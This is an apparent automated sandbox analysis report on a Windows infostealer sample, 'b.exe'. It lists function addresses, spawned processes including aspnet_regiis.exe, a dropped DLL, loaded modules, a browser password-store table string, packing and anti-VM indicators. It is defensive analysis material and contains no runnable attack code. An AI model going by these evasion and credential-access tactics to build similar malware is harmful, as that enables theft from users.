Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_0245BB10	2_2_0245BB10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_0245FB20	2_2_0245FB20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_02466BD0	2_2_02466BD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_02471BE8	2_2_02471BE8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_02445BF0	2_2_02445BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_0245EBF0	2_2_0245EBF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_024813A0	2_2_024813A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_02481860	2_2_02481860
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_02447870	2_2_02447870
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_02463815	2_2_02463815
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_0246A0D5	2_2_0246A0D5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_0245E0E8	2_2_0245E0E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_024750F0	2_2_024750F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_0246B0FA	2_2_0246B0FA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_0247B0A0	2_2_0247B0A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_0247A0A0	2_2_0247A0A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_024468B0	2_2_024468B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_0246C14A	2_2_0246C14A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_02481930	2_2_02481930
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_024729C6	2_2_024729C6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_0245FF7F	2_2_0245FF7F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_02479E40	2_2_02479E40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_02448E50	2_2_02448E50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_0244CE52	2_2_0244CE52
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_02466E00	2_2_02466E00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_02472615	2_2_02472615
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_0245F6E0	2_2_0245F6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_024696F4	2_2_024696F4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_024496A0	2_2_024496A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_02482F40	2_2_02482F40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_02466F70	2_2_02466F70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_0245FF7F	2_2_0245FF7F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_02444F05	2_2_02444F05
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_0247D710	2_2_0247D710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_0245C7C9	2_2_0245C7C9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_024687D0	2_2_024687D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_0244E7D9	2_2_0244E7D9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_0245EFF5	2_2_0245EFF5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_0246EF87	2_2_0246EF87
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_0245BFB6	2_2_0245BFB6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_0246E7BB	2_2_0246E7BB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_02465410	2_2_02465410
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_02470C1C	2_2_02470C1C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_02460C90	2_2_02460C90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_0246FD65	2_2_0246FD65
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_02446D60	2_2_02446D60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_02443570	2_2_02443570
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_02469520	2_2_02469520
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_024605F0	2_2_024605F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_024455F8	2_2_024455F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_0246B588	2_2_0246B588
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_0245B5A1	2_2_0245B5A1

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: String function: 024483F0 appears 39 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: String function: 024590C0 appears 58 times

Source: C:\Users\user\Desktop\b.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7648 -s 1228

Source: b.exe, 00000000.00000000.1696067106.0000000000912000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameRubyLiamViolet.zYOfT vs b.exe
Source: b.exe, 00000000.00000002.1952651431.0000000000FBE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs b.exe
Source: b.exe	Binary or memory string: OriginalFilenameRubyLiamViolet.zYOfT vs b.exe

Source: b.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: b.exe

Static PE information: Section: m@ka ZLIB complexity 1.0003175535402098

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@5/7@2/2

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Code function: 2_2_0247AAE0 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,

2_2_0247AAE0

Source: C:\Users\user\Desktop\b.exe

File created: C:\Users\user\AppData\Roaming\gdi32.dll

Jump to behavior

Source: C:\Users\user\Desktop\b.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7656:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7648

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\408c72f2-ef52-49a9-932d-7df56a1baadd

Jump to behavior

Source: b.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%

Source: C:\Users\user\Desktop\b.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: aspnet_regiis.exe, 00000002.00000003.1804566888.0000000004DB7000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: b.exe	ReversingLabs: Detection: 26%
Source: b.exe	Virustotal: Detection: 30%

Source: b.exe	String found in binary or memory: -addpset
Source: b.exe	String found in binary or memory: -addfulltrust
Source: b.exe	String found in binary or memory: -addgroup
Source: b.exe	String found in binary or memory: -help

Source: C:\Users\user\Desktop\b.exe

File read: C:\Users\user\Desktop\b.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\b.exe "C:\Users\user\Desktop\b.exe"
Source: C:\Users\user\Desktop\b.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\b.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
Source: C:\Users\user\Desktop\b.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7648 -s 1228
Source: C:\Users\user\Desktop\b.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"	Jump to behavior

Source: C:\Users\user\Desktop\b.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\b.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\b.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\b.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\b.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\b.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\b.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\b.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\b.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\b.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\b.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\b.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\b.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\b.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: C:\Users\user\Desktop\b.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\b.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: b.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: b.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbLIST source: b.exe, 00000000.00000002.1952651431.0000000001078000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\Desktop\b.PDB source: b.exe, 00000000.00000002.1952651431.0000000000FF2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\mscorlib.pdb source: b.exe, 00000000.00000002.1952651431.000000000105E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdb source: b.exe, 00000000.00000002.1952651431.000000000106E000.00000004.00000020.00020000.00000000.sdmp, WER95AE.tmp.dmp.5.dr
Source:	Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: b.exe, 00000000.00000002.1952651431.0000000001049000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.ni.pdb source: WER95AE.tmp.dmp.5.dr
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbl, source: b.exe, 00000000.00000002.1952651431.0000000001078000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: n0C:\Windows\mscorlib.pdb source: b.exe, 00000000.00000002.1952543615.0000000000CFA000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\mscorlib.pdb source: b.exe, 00000000.00000002.1952651431.0000000001019000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Desktop\b.PDBD{ source: b.exe, 00000000.00000002.1952543615.0000000000CFA000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: mscorlib.ni.pdbRSDS source: WER95AE.tmp.dmp.5.dr

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\b.exe

Unpacked PE file: 0.2.b.exe.860000.0.unpack m@ka:EW;.text:ER;.rsrc:R;.reloc:R;Unknown_Section4:ER; vs Unknown_Section0:EW;Unknown_Section1:ER;Unknown_Section2:R;Unknown_Section3:R;Unknown_Section4:ER;

Source: b.exe	Static PE information: section name: m@ka
Source: b.exe	Static PE information: section name:

Source: C:\Users\user\Desktop\b.exe	Code function: 0_2_008674E2 push esi; iretd		0_2_008674E6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_3_028CCF2F push 68028CCFh; iretd		2_3_028CCF6D

Source: b.exe

Static PE information: section name: m@ka entropy: 7.999658471887131

Source: C:\Users\user\Desktop\b.exe

File created: C:\Users\user\AppData\Roaming\gdi32.dll

Jump to dropped file

Source: C:\Users\user\Desktop\b.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\b.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\b.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\b.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\b.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\b.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\b.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\b.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\b.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\b.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\b.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\b.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\b.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\b.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\b.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\b.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\b.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\b.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\b.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\b.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: b.exe PID: 7648, type: MEMORYSTR

Query firmware table information (likely to detect VMs)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

System information queried: FirmwareTableInformation

Jump to behavior

Source: C:\Users\user\Desktop\b.exe	Memory allocated: 2A30000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\b.exe	Memory allocated: 2BF0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\b.exe	Memory allocated: 2A30000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\b.exe	Memory allocated: 5270000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\b.exe	Memory allocated: 6270000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\b.exe	Memory allocated: 63A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\b.exe	Memory allocated: 73A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\b.exe	Memory allocated: 76F0000 memory reserve \| memory write watch	Jump to behavior
